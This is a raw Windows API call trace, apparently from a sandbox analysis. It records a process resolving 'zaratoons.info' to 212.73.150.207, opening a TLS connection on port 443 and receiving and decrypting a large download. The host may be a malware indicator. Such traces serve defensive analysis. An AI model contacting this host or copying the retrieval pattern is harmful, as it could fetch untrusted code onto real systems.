	[0901.836] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c5ed880*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c5ed878 | out: ppResult=0x1c5ed878*=0x28bc320*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x32b570*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0903.480] CoTaskMemFree (pv=0x32b510) 
	[0903.480] CoTaskMemFree (pv=0x0) 
	[0903.481] FreeAddrInfoW (pAddrInfo=0x28bc320*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x32b570*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0903.483] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a8
	[0903.483] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4a0
	[0903.483] ioctlsocket (in: s=0x4a8, cmd=-2147195266, argp=0x1c5ed898 | out: argp=0x1c5ed898) returned 0
	[0903.483] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b0
	[0903.483] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b4
	[0903.483] ioctlsocket (in: s=0x4b0, cmd=-2147195266, argp=0x1c5ed898 | out: argp=0x1c5ed898) returned 0
	[0903.483] WSAIoctl (in: s=0x4a8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c5ed810, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c5ed810, lpOverlapped=0x0) returned -1
	[0903.483] CoTaskMemAlloc (cb=0x204) returned 0x3729b0
	[0903.484] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3729b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0903.484] CoTaskMemFree (pv=0x3729b0) 
	[0903.484] WSAEventSelect (s=0x4a8, hEventObject=0x4a0, lNetworkEvents=512) returned 0
	[0903.484] WSAIoctl (in: s=0x4b0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c5ed810, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c5ed810, lpOverlapped=0x0) returned -1
	[0903.484] CoTaskMemAlloc (cb=0x204) returned 0x3729b0
	[0903.484] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3729b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0903.484] CoTaskMemFree (pv=0x3729b0) 
	[0903.484] WSAEventSelect (s=0x4b0, hEventObject=0x4b4, lNetworkEvents=512) returned 0
	[0903.486] GetAdaptersAddresses () returned 0x6f
	[0904.264] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x28e3d50
	[0904.264] GetAdaptersAddresses () returned 0x0
	[0904.287] LocalFree (hMem=0x28e3d50) returned 0x0
	[0904.290] WSAConnect (in: s=0x498, name=0x2f9c398*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0904.724] closesocket (s=0x494) returned 0
	[0904.779] EnumerateSecurityPackagesW (in: pcPackages=0x1c5ed6f8, ppPackageInfo=0x1c5ed6f0 | out: pcPackages=0x1c5ed6f8, ppPackageInfo=0x1c5ed6f0) returned 0x0
	[0904.783] lstrlenW (lpString="Negotiate") returned 9
	[0904.784] CoTaskMemAlloc (cb=0x16) returned 0x32b550
	[0904.784] RtlMoveMemory (in: Destination=0x32b550, Source=0x351020, Length=0x14 | out: Destination=0x32b550) 
	[0904.784] CoTaskMemFree (pv=0x32b550) 
	[0904.784] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0904.784] CoTaskMemAlloc (cb=0x3c) returned 0x28d7530
	[0904.784] RtlMoveMemory (in: Destination=0x28d7530, Source=0x351034, Length=0x3a | out: Destination=0x28d7530) 
	[0904.784] CoTaskMemFree (pv=0x28d7530) 
	[0904.784] lstrlenW (lpString="NegoExtender") returned 12
	[0904.785] CoTaskMemAlloc (cb=0x1c) returned 0x28d0da0
	[0904.785] RtlMoveMemory (in: Destination=0x28d0da0, Source=0x35106e, Length=0x1a | out: Destination=0x28d0da0) 
	[0904.785] CoTaskMemFree (pv=0x28d0da0) 
	[0904.785] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0904.785] CoTaskMemAlloc (cb=0x3e) returned 0x28d7530
	[0904.785] RtlMoveMemory (in: Destination=0x28d7530, Source=0x351088, Length=0x3c | out: Destination=0x28d7530) 
	[0904.785] CoTaskMemFree (pv=0x28d7530) 
	[0904.785] lstrlenW (lpString="Kerberos") returned 8
	[0904.785] CoTaskMemAlloc (cb=0x14) returned 0x32b550
	[0904.785] RtlMoveMemory (in: Destination=0x32b550, Source=0x3510c4, Length=0x12 | out: Destination=0x32b550) 
	[0904.785] CoTaskMemFree (pv=0x32b550) 
	[0904.785] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0904.785] CoTaskMemAlloc (cb=0x32) returned 0x28bc3a0
	[0904.785] RtlMoveMemory (in: Destination=0x28bc3a0, Source=0x3510d6, Length=0x30 | out: Destination=0x28bc3a0) 
	[0904.785] CoTaskMemFree (pv=0x28bc3a0) 
	[0904.785] lstrlenW (lpString="NTLM") returned 4
	[0904.785] CoTaskMemAlloc (cb=0xc) returned 0x32b550
	[0904.785] RtlMoveMemory (in: Destination=0x32b550, Source=0x351106, Length=0xa | out: Destination=0x32b550) 
	[0904.785] CoTaskMemFree (pv=0x32b550) 
	[0904.786] lstrlenW (lpString="NTLM Security Package") returned 21
	[0904.786] CoTaskMemAlloc (cb=0x2e) returned 0x28bc3a0
	[0904.786] RtlMoveMemory (in: Destination=0x28bc3a0, Source=0x351110, Length=0x2c | out: Destination=0x28bc3a0) 
	[0904.786] CoTaskMemFree (pv=0x28bc3a0) 
	[0904.786] lstrlenW (lpString="Schannel") returned 8
	[0904.786] CoTaskMemAlloc (cb=0x14) returned 0x32b550
	[0904.786] RtlMoveMemory (in: Destination=0x32b550, Source=0x35113c, Length=0x12 | out: Destination=0x32b550) 
	[0904.786] CoTaskMemFree (pv=0x32b550) 
	[0904.786] lstrlenW (lpString="Schannel Security Package") returned 25
	[0904.786] CoTaskMemAlloc (cb=0x36) returned 0x28bc3a0
	[0904.786] RtlMoveMemory (in: Destination=0x28bc3a0, Source=0x35114e, Length=0x34 | out: Destination=0x28bc3a0) 
	[0904.786] CoTaskMemFree (pv=0x28bc3a0) 
	[0904.786] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0904.786] CoTaskMemAlloc (cb=0x5c) returned 0x28ab840
	[0904.786] RtlMoveMemory (in: Destination=0x28ab840, Source=0x351182, Length=0x5a | out: Destination=0x28ab840) 
	[0904.786] CoTaskMemFree (pv=0x28ab840) 
	[0904.786] lstrlenW (lpString="Schannel Security Package") returned 25
	[0904.786] CoTaskMemAlloc (cb=0x36) returned 0x28bc3a0
	[0904.786] RtlMoveMemory (in: Destination=0x28bc3a0, Source=0x3511dc, Length=0x34 | out: Destination=0x28bc3a0) 
	[0904.786] CoTaskMemFree (pv=0x28bc3a0) 
	[0904.787] lstrlenW (lpString="WDigest") returned 7
	[0904.787] CoTaskMemAlloc (cb=0x12) returned 0x32b550
	[0904.787] RtlMoveMemory (in: Destination=0x32b550, Source=0x351210, Length=0x10 | out: Destination=0x32b550) 
	[0904.787] CoTaskMemFree (pv=0x32b550) 
	[0904.787] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0904.787] CoTaskMemAlloc (cb=0x46) returned 0x28d7530
	[0904.787] RtlMoveMemory (in: Destination=0x28d7530, Source=0x351220, Length=0x44 | out: Destination=0x28d7530) 
	[0904.787] CoTaskMemFree (pv=0x28d7530) 
	[0904.787] lstrlenW (lpString="TSSSP") returned 5
	[0904.787] CoTaskMemAlloc (cb=0xe) returned 0x32b550
	[0904.787] RtlMoveMemory (in: Destination=0x32b550, Source=0x351264, Length=0xc | out: Destination=0x32b550) 
	[0904.787] CoTaskMemFree (pv=0x32b550) 
	[0904.787] lstrlenW (lpString="TS Service Security Package") returned 27
	[0904.787] CoTaskMemAlloc (cb=0x3a) returned 0x28d7530
	[0904.788] RtlMoveMemory (in: Destination=0x28d7530, Source=0x351270, Length=0x38 | out: Destination=0x28d7530) 
	[0904.788] CoTaskMemFree (pv=0x28d7530) 
	[0904.788] lstrlenW (lpString="pku2u") returned 5
	[0904.788] CoTaskMemAlloc (cb=0xe) returned 0x32b550
	[0904.788] RtlMoveMemory (in: Destination=0x32b550, Source=0x3512a8, Length=0xc | out: Destination=0x32b550) 
	[0904.788] CoTaskMemFree (pv=0x32b550) 
	[0904.788] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0904.788] CoTaskMemAlloc (cb=0x30) returned 0x28bc3a0
	[0904.788] RtlMoveMemory (in: Destination=0x28bc3a0, Source=0x3512b4, Length=0x2e | out: Destination=0x28bc3a0) 
	[0904.788] CoTaskMemFree (pv=0x28bc3a0) 
	[0904.788] lstrlenW (lpString="CREDSSP") returned 7
	[0904.788] CoTaskMemAlloc (cb=0x12) returned 0x32b550
	[0904.788] RtlMoveMemory (in: Destination=0x32b550, Source=0x3512e2, Length=0x10 | out: Destination=0x32b550) 
	[0904.788] CoTaskMemFree (pv=0x32b550) 
	[0904.788] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0904.788] CoTaskMemAlloc (cb=0x4a) returned 0x28de4c0
	[0904.788] RtlMoveMemory (in: Destination=0x28de4c0, Source=0x3512f2, Length=0x48 | out: Destination=0x28de4c0) 
	[0904.788] CoTaskMemFree (pv=0x28de4c0) 
	[0904.789] FreeContextBuffer (in: pvContextBuffer=0x350ee0 | out: pvContextBuffer=0x350ee0) returned 0x0
	[0904.796] GetCurrentProcess () returned 0xffffffffffffffff
	[0904.796] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed1d8 | out: TokenHandle=0x1c5ed1d8*=0x494) returned 1
	[0904.801] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2fa0550, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c5ed0e8, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c5ed0d8, ptsExpiry=0x1c5ed0d0 | out: phCredential=0x1c5ed0d8, ptsExpiry=0x1c5ed0d0) returned 0x0
	[0904.810] InitializeSecurityContextW (in: phCredential=0x1c5ed2e0, phContext=0x0, pTargetName=0x2f94fb8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c5ed2d0, pOutput=0x2fa2c98, pfContextAttr=0x1c5ed2c8, ptsExpiry=0x1c5ed2c0 | out: phNewContext=0x1c5ed2d0, pOutput=0x2fa2c98, pfContextAttr=0x1c5ed2c8, ptsExpiry=0x1c5ed2c0) returned 0x90312
	[0904.811] FreeContextBuffer (in: pvContextBuffer=0x28b4850 | out: pvContextBuffer=0x28b4850) returned 0x0
	[0904.818] send (s=0x498, buf=0x2fa2d68*, len=118, flags=0) returned 118
	[0904.820] recv (in: s=0x498, buf=0x2fa2d68, len=5, flags=0 | out: buf=0x2fa2d68*) returned 5
	[0905.064] recv (in: s=0x498, buf=0x2fa2d6d, len=93, flags=0 | out: buf=0x2fa2d6d*) returned 93
	[0905.065] InitializeSecurityContextW (in: phCredential=0x1c5ed200, phContext=0x1c5ed4b0, pTargetName=0x2f94fb8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa3078, Reserved2=0x0, phNewContext=0x1c5ed1f0, pOutput=0x2fa3098, pfContextAttr=0x1c5ed1e8, ptsExpiry=0x1c5ed1e0 | out: phNewContext=0x1c5ed1f0, pOutput=0x2fa3098, pfContextAttr=0x1c5ed1e8, ptsExpiry=0x1c5ed1e0) returned 0x90312
	[0905.065] recv (in: s=0x498, buf=0x2fa3188, len=5, flags=0 | out: buf=0x2fa3188*) returned 5
	[0905.066] recv (in: s=0x498, buf=0x2fa31ad, len=2556, flags=0 | out: buf=0x2fa31ad*) returned 2556
	[0905.066] InitializeSecurityContextW (in: phCredential=0x1c5ed130, phContext=0x1c5ed3e0, pTargetName=0x2f94fb8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa3c80, Reserved2=0x0, phNewContext=0x1c5ed120, pOutput=0x2fa3ca0, pfContextAttr=0x1c5ed118, ptsExpiry=0x1c5ed110 | out: phNewContext=0x1c5ed120, pOutput=0x2fa3ca0, pfContextAttr=0x1c5ed118, ptsExpiry=0x1c5ed110) returned 0x90312
	[0905.066] recv (in: s=0x498, buf=0x2fa3d90, len=5, flags=0 | out: buf=0x2fa3d90*) returned 5
	[0905.066] recv (in: s=0x498, buf=0x2fa3db5, len=331, flags=0 | out: buf=0x2fa3db5*) returned 16
	[0905.066] recv (in: s=0x498, buf=0x2fa3dc5, len=315, flags=0 | out: buf=0x2fa3dc5*) returned 315
	[0905.266] InitializeSecurityContextW (in: phCredential=0x1c5ed060, phContext=0x1c5ed310, pTargetName=0x2f94fb8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa3fd0, Reserved2=0x0, phNewContext=0x1c5ed050, pOutput=0x2fa3ff0, pfContextAttr=0x1c5ed048, ptsExpiry=0x1c5ed040 | out: phNewContext=0x1c5ed050, pOutput=0x2fa3ff0, pfContextAttr=0x1c5ed048, ptsExpiry=0x1c5ed040) returned 0x90312
	[0905.267] recv (in: s=0x498, buf=0x2fa40e0, len=5, flags=0 | out: buf=0x2fa40e0*) returned 5
	[0905.267] recv (in: s=0x498, buf=0x2fa4105, len=4, flags=0 | out: buf=0x2fa4105*) returned 4
	[0905.267] InitializeSecurityContextW (in: phCredential=0x1c5ecf90, phContext=0x1c5ed240, pTargetName=0x2f94fb8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa41e0, Reserved2=0x0, phNewContext=0x1c5ecf80, pOutput=0x2fa4200, pfContextAttr=0x1c5ecf78, ptsExpiry=0x1c5ecf70 | out: phNewContext=0x1c5ecf80, pOutput=0x2fa4200, pfContextAttr=0x1c5ecf78, ptsExpiry=0x1c5ecf70) returned 0x90312
	[0905.285] FreeContextBuffer (in: pvContextBuffer=0x2892d60 | out: pvContextBuffer=0x2892d60) returned 0x0
	[0905.285] send (s=0x498, buf=0x2fa42d0*, len=134, flags=0) returned 134
	[0905.285] recv (in: s=0x498, buf=0x2fa42d0, len=5, flags=0 | out: buf=0x2fa42d0*) returned 5
	[0906.068] recv (in: s=0x498, buf=0x2fa42d5, len=1, flags=0 | out: buf=0x2fa42d5*) returned 1
	[0906.069] InitializeSecurityContextW (in: phCredential=0x1c5ecec0, phContext=0x1c5ed170, pTargetName=0x2f94fb8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa4448, Reserved2=0x0, phNewContext=0x1c5eceb0, pOutput=0x2fa4468, pfContextAttr=0x1c5ecea8, ptsExpiry=0x1c5ecea0 | out: phNewContext=0x1c5eceb0, pOutput=0x2fa4468, pfContextAttr=0x1c5ecea8, ptsExpiry=0x1c5ecea0) returned 0x90312
	[0906.069] recv (in: s=0x498, buf=0x2fa4558, len=5, flags=0 | out: buf=0x2fa4558*) returned 5
	[0906.069] recv (in: s=0x498, buf=0x2fa457d, len=48, flags=0 | out: buf=0x2fa457d*) returned 48
	[0906.069] InitializeSecurityContextW (in: phCredential=0x1c5ecdf0, phContext=0x1c5ed0a0, pTargetName=0x2f94fb8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa4680, Reserved2=0x0, phNewContext=0x1c5ecde0, pOutput=0x2fa46a0, pfContextAttr=0x1c5ecdd8, ptsExpiry=0x1c5ecdd0 | out: phNewContext=0x1c5ecde0, pOutput=0x2fa46a0, pfContextAttr=0x1c5ecdd8, ptsExpiry=0x1c5ecdd0) returned 0x0
	[0906.085] QueryContextAttributesW (in: phContext=0x1c5ed050, ulAttribute=0x4, pBuffer=0x2fa47b8 | out: pBuffer=0x2fa47b8) returned 0x0
	[0906.085] QueryContextAttributesW (in: phContext=0x1c5ed050, ulAttribute=0x5a, pBuffer=0x2fa4838 | out: pBuffer=0x2fa4838) returned 0x0
	[0906.095] QueryContextAttributesW (in: phContext=0x1c5ecf00, ulAttribute=0x53, pBuffer=0x2fa4b88 | out: pBuffer=0x2fa4b88) returned 0x0
	[0906.179] CertDuplicateCRLContext (pCrlContext=0x28af820) returned 0x28af820
	[0906.182] CertDuplicateStore (hCertStore=0x289eb90) returned 0x289eb90
	[0906.183] CertEnumCertificatesInStore (hCertStore=0x289eb90, pPrevCertContext=0x0) returned 0x28af8a0
	[0906.183] CertDuplicateCRLContext (pCrlContext=0x28af8a0) returned 0x28af8a0
	[0906.183] CertEnumCertificatesInStore (hCertStore=0x289eb90, pPrevCertContext=0x28af8a0) returned 0x28af820
	[0906.183] CertDuplicateCRLContext (pCrlContext=0x28af820) returned 0x28af820
	[0906.183] CertEnumCertificatesInStore (hCertStore=0x289eb90, pPrevCertContext=0x28af820) returned 0x0
	[0906.184] CertCloseStore (hCertStore=0x289eb90, dwFlags=0x0) returned 1
	[0906.184] CertFreeCRLContext (pCrlContext=0x28af820) returned 1
	[0906.198] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x289ec60
	[0906.199] CertAddCRLLinkToStore (in: hCertStore=0x289ec60, pCrlContext=0x28af8a0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0906.199] CertAddCRLLinkToStore (in: hCertStore=0x289ec60, pCrlContext=0x28af820, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0906.202] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x28af820, pTime=0x1c5ecf08, hAdditionalStore=0x289ec60, pChainPara=0x1c5ecf10, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c5ecf00 | out: ppChainContext=0x1c5ecf00) returned 1
	[0907.561] CertDuplicateCertificateChain (pChainContext=0x1cdbe820) returned 0x1cdbe820
	[0907.562] CertDuplicateCRLContext (pCrlContext=0x28af820) returned 0x28af820
	[0907.562] CertDuplicateCRLContext (pCrlContext=0x1cdf8550) returned 0x1cdf8550
	[0907.563] CertDuplicateCRLContext (pCrlContext=0x1cdf85d0) returned 0x1cdf85d0
	[0907.563] CertFreeCertificateChain (pChainContext=0x1cdbe820) 
	[0907.564] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1cdbe820, pPolicyPara=0x1c5ed088, pPolicyStatus=0x1c5ed068 | out: pPolicyStatus=0x1c5ed068) returned 1
	[0907.565] SetLastError (dwErrCode=0x0) 
	[0907.568] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1cdbe820, pPolicyPara=0x1c5ed160, pPolicyStatus=0x1c5ed148 | out: pPolicyStatus=0x1c5ed148) returned 1
	[0907.570] CertFreeCertificateChain (pChainContext=0x1cdbe820) 
	[0907.570] CertFreeCRLContext (pCrlContext=0x28af820) returned 1
	[0907.574] EncryptMessage (in: phContext=0x1c5ed710, fQOP=0x0, pMessage=0x2fa7400, MessageSeqNo=0x0 | out: pMessage=0x2fa7400) returned 0x0
	[0907.574] send (s=0x498, buf=0x2fa7140*, len=117, flags=0) returned 117
	[0907.587] setsockopt (s=0x498, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0907.587] recv (in: s=0x498, buf=0x2fa7560, len=5, flags=0 | out: buf=0x2fa7560*) returned 5
	[0907.939] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 5355
	[0907.939] recv (in: s=0x498, buf=0x2fa8a70, len=11061, flags=0 | out: buf=0x2fa8a70*) returned 11061
	[0909.245] DecryptMessage (in: phContext=0x1c5ed2d0, pMessage=0x2fab6b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fab6b8, pfQOP=0x0) returned 0x0
	[0909.266] setsockopt (s=0x498, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0
	[0909.274] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0909.274] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 5014
	[0909.274] recv (in: s=0x498, buf=0x2fa891b, len=11402, flags=0 | out: buf=0x2fa891b*) returned 11402
	[0909.456] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcccc8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcccc8, pfQOP=0x0) returned 0x0
	[0909.456] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0909.457] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 385
	[0909.457] recv (in: s=0x498, buf=0x2fa7706, len=16031, flags=0 | out: buf=0x2fa7706*) returned 16031
	[0909.994] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fccf08, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fccf08, pfQOP=0x0) returned 0x0
	[0909.995] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0909.995] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 2724
	[0909.995] recv (in: s=0x498, buf=0x2fa8029, len=13692, flags=0 | out: buf=0x2fa8029*) returned 13692
	[0911.685] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcd148, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcd148, pfQOP=0x0) returned 0x0
	[0911.685] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0911.686] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 16416
	[0911.686] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcd388, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcd388, pfQOP=0x0) returned 0x0
	[0911.691] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0911.691] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 16416
	[0911.691] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcd618, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcd618, pfQOP=0x0) returned 0x0
	[0911.692] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0911.692] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 16416
	[0911.692] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcd858, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcd858, pfQOP=0x0) returned 0x0
	[0911.692] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0911.692] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 16416
	[0911.693] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcda98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcda98, pfQOP=0x0) returned 0x0
	[0911.693] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0911.693] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 5307
	[0911.693] recv (in: s=0x498, buf=0x2fa8a40, len=11109, flags=0 | out: buf=0x2fa8a40*) returned 11109
	[0912.108] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcdd00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcdd00, pfQOP=0x0) returned 0x0
	[0912.109] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0912.109] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 8718
	[0912.109] recv (in: s=0x498, buf=0x2fa9793, len=7698, flags=0 | out: buf=0x2fa9793*) returned 3472
	[0912.195] recv (in: s=0x498, buf=0x2faa523, len=4226, flags=0 | out: buf=0x2faa523*) returned 2424
	[0912.195] recv (in: s=0x498, buf=0x2faae9b, len=1802, flags=0 | out: buf=0x2faae9b*) returned 1802
	[0912.197] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcdf40, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcdf40, pfQOP=0x0) returned 0x0
	[0912.198] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0912.198] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 4625
	[0912.198] recv (in: s=0x498, buf=0x2fa8796, len=11791, flags=0 | out: buf=0x2fa8796*) returned 11791
	[0912.371] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fce180, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fce180, pfQOP=0x0) returned 0x0
	[0912.374] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0912.374] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 8572
	[0912.374] recv (in: s=0x498, buf=0x2fa9701, len=7844, flags=0 | out: buf=0x2fa9701*) returned 3472
	[0912.463] recv (in: s=0x498, buf=0x2faa491, len=4372, flags=0 | out: buf=0x2faa491*) returned 4372
	[0912.463] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fce3e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fce3e8, pfQOP=0x0) returned 0x0
	[0912.463] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0912.464] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 7695
	[0912.464] recv (in: s=0x498, buf=0x2fa9394, len=8721, flags=0 | out: buf=0x2fa9394*) returned 536
	[0912.464] recv (in: s=0x498, buf=0x2fa95ac, len=8185, flags=0 | out: buf=0x2fa95ac*) returned 8185
	[0912.557] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fce628, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fce628, pfQOP=0x0) returned 0x0
	[0912.560] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0912.561] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 4674
	[0912.561] recv (in: s=0x498, buf=0x2fa87c7, len=11742, flags=0 | out: buf=0x2fa87c7*) returned 11742
	[0912.705] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fce8b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fce8b8, pfQOP=0x0) returned 0x0
	[0912.706] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0912.706] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 2189
	[0912.706] recv (in: s=0x498, buf=0x2fa7e12, len=14227, flags=0 | out: buf=0x2fa7e12*) returned 14227
	[0912.882] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fceaf8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fceaf8, pfQOP=0x0) returned 0x0
	[0912.883] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0912.883] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 5064
	[0912.883] recv (in: s=0x498, buf=0x2fa894d, len=11352, flags=0 | out: buf=0x2fa894d*) returned 11352
	[0913.177] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fced38, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fced38, pfQOP=0x0) returned 0x0
